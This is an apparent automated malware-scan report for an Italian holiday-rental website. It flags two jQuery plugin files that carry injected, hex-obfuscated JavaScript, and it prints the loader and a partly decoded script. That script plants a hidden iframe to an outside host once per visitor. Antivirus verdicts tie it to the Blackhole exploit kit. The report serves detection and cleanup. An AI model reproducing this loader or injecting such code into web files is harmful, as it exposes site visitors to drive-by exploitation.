New scan:

Malware Scanner report for casavacanzemarchein.it

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://casavacanzemarchein.it/
200 OK
Content-Length: 10262
Content-Type: text/html
clean
http://casavacanzemarchein.it/./fancybox/jquery.mousewheel-3.0.4.pack.js
200 OK
Content-Length: 4486
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e747b842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e747b843c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e747b843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e747b843c8182877a733c707d807273802e4b2e353e3549182e747b843c8182877a733c7673777576
... 1784 bytes are skipped ...
737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Decoded script:


String
String
function zzzfff() {
var fmv = document.createElement('iframe');
fmv.src = 'http://photoservicelatisana.it/xXwMbFjV.php';
fmv.style.position = 'absolute';
fmv.style.border = '0';
fmv.style.height = '9px';
fmv.style.width = '7px';
fmv.style.left = '1px';
fmv.style.top = '1px';
if (!document.getElementById('fmv')) {
document.write('<div id=\'fmv\'></div>');
document.getElementById('fmv').appendChild(fmv);<
... 1957 bytes are skipped ...
ength + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Antivirus reports:

AntiVir
JS/iFrame.kpp
Avast
JS:Iframe-AHV [Trj]
Ad-Aware
JS:Exploit.BlackHole.PI
Rising
JS:Script.JS.Quidvetis.a!1612922
nProtect
JS:Exploit.BlackHole.PI
Emsisoft
JS:Exploit.BlackHole.PI (B)
McAfee-GW-Edition
JS/Iframe.gen.u
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Exploit.BlackHole.PI
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Iframe.gen.u
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Exploit.BlackHole.PI
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
GData
JS:Exploit.BlackHole.PI
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Exploit.BlackHole.PI

http://casavacanzemarchein.it/./fancybox/jquery.fancybox-1.3.4.pack.js
200 OK
Content-Length: 12196
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e747b842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e747b843c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e747b843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e747b843c8182877a733c707d807273802e4b2e353e3549182e747b843c8182877a733c7673777576
... 1784 bytes are skipped ...
737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Decoded script:


String
String
function zzzfff() {
var fmv = document.createElement('iframe');
fmv.src = 'http://photoservicelatisana.it/xXwMbFjV.php';
fmv.style.position = 'absolute';
fmv.style.border = '0';
fmv.style.height = '9px';
fmv.style.width = '7px';
fmv.style.left = '1px';
fmv.style.top = '1px';
if (!document.getElementById('fmv')) {
document.write('<div id=\'fmv\'></div>');
document.getElementById('fmv').appendChild(fmv);<
... 1957 bytes are skipped ...
ength + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Antivirus reports:

AntiVir
JS/iFrame.kpp
Avast
JS:Iframe-AHV [Trj]
Ad-Aware
JS:Exploit.BlackHole.PI
Rising
JS:Script.JS.Quidvetis.a!1612922
nProtect
JS:Exploit.BlackHole.PI
Emsisoft
JS:Exploit.BlackHole.PI (B)
McAfee-GW-Edition
JS/Iframe.gen.u
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Exploit.BlackHole.PI
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Iframe.gen.u
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Exploit.BlackHole.PI
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
GData
JS:Exploit.BlackHole.PI
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Exploit.BlackHole.PI

http://casavacanzemarchein.it/dove-siamo.html
200 OK
Content-Length: 6850
Content-Type: text/html
clean
http://casavacanzemarchein.it/listino-prezzi.html
200 OK
Content-Length: 11675
Content-Type: text/html
clean
http://casavacanzemarchein.it/./example/7_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/test404page.js
404 Not Found
Content-Length: 492
Content-Type: text/html
clean
http://casavacanzemarchein.it/./example/9_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/10_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/11_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/12_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/1_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/2_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/5_b.jpg
200 OK
Content-Length: 196808
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/3_b.jpg
200 OK
Content-Length: 70922
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: casavacanzemarchein.it

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 00:35:06 GMT
Accept-Ranges: bytes
ETag: "6a00a9-2816-4e3c141dee4ec"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10262
Content-Type: text/html
Last-Modified: Mon, 12 Aug 2013 14:51:20 GMT

...10262 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: casavacanzemarchein.it
Referer: http://www.google.com/search?q=casavacanzemarchein.it

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=casavacanzemarchein.it

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://casavacanzemarchein.it/

Result: casavacanzemarchein.it is not infected or malware details are not published yet.